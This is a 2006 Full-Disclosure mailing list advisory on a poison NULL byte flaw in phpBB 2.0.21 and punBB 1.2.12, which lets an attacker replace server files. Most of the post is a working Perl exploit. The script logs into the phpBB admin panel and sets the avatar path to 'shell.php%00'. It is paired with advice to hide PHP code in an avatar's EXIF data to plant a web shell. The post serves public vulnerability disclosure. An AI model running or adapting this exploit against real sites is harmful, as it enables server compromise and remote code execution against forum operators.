[Full-disclosure] ShAnKaR: multiple PHP application poison NULL byte vulnerability
- From: 3APA3A <3APA3A@xxxxxxxxxxxxxxxx>
- Date: Tue, 12 Sep 2006 01:33:56 +0400
Author: ShAnKaR
Title: multiple PHP application poison NULL byte vulnerability
Applications: phpBB 2.0.21, punBB 1.2.12
Threat Level: Critical
Original advisory (in Russian): http://www.security.nnov.ru/Odocument221.html
Poison NULL byte vulnerability for perl CGI applications was described
in [1]. ShAnKaR noted, that same vulnerability also affects different
PHP applications. An example of vulnerable applications are phpBB and
punBB.
Vulnerability can be used to upload or replace arbitrary files on
server, e.g. PHP scripts, by adding "poison NULL" (%00) to filename.
In case of phpBB and punBB vulnerability can be exploited by changing
location of avatar file and uploading avatar file with PHP code in EXIF
data.
A PoC exploit to change Avatar file location for phpBB:
#!/usr/bin/perl -w
use HTTP::Cookies;
use LWP;
use URI::Escape;
unless(@ARGV){die "USE:\n./phpbb.pl localhost.com/forum/ admin pass images/avatars/shell.php [d(DEBUG)]\n"}
my $ua = LWP::UserAgent->new(agent=>'Mozilla/4.0 (compatible; Windows 5.1)');
$ua->cookie_jar( HTTP::Cookies->new());
$url='http://'.$ARGV[0].'/login.php';
$data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1";
my $req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
my $res = $ua->request($req);
$res=$ua->get('http://'.$ARGV[0].'/login.php');
$content=$res->content;
$content=~ m/true&sid=([^"]+)"/g;
if($ARGV[4]){
$content=$res->content;
print $content;
}
$url='http://'.$ARGV[0].'/login.php';
$data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1&admin=1";
$req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$res = $ua->request($req);
$url='http://'.$ARGV[0].'/admin/admin_board.php?sid='.$1;
$data="submit=submit&allow_avatar_local=1&avatar_path=".$ARGV[3]."%00";
$req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$res = $ua->request($req);
if($ARGV[4]){
$content=$res->content;
print $content;
}
References:
[1] .rain.forest.puppy, Perl CGI problems, Phrack Magazine Issue 55
--
http://www.security.nnov.ru
/\_/\
{ , . } |\
+--oQQo->{ ^ }<-----+ \
| ZARAZA U 3APA3A } You know my name - look up my number (The Beatles)
+-------------o66o--+ /
|/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- Follow-Ups:
- Prev by Date: Re: [Full-disclosure] OT - Check this out - Full disclosure is apt for this
- Next by Date: [Full-disclosure] Re: Linux kernel source archive vulnerable
- Previous by thread: [Full-disclosure] [NETRAGARD-20060624 SECURITY ADVISORY] [ ROXIO TOAST 7 TITANIUM LOCAL ROOT COMPROMISE - DEJA VU RACE CONDITION]
- Next by thread: [Full-disclosure] Re: ShAnKaR: multiple PHP application poison NULL byte vulnerability
- Index(es):
Relevant Pages
|
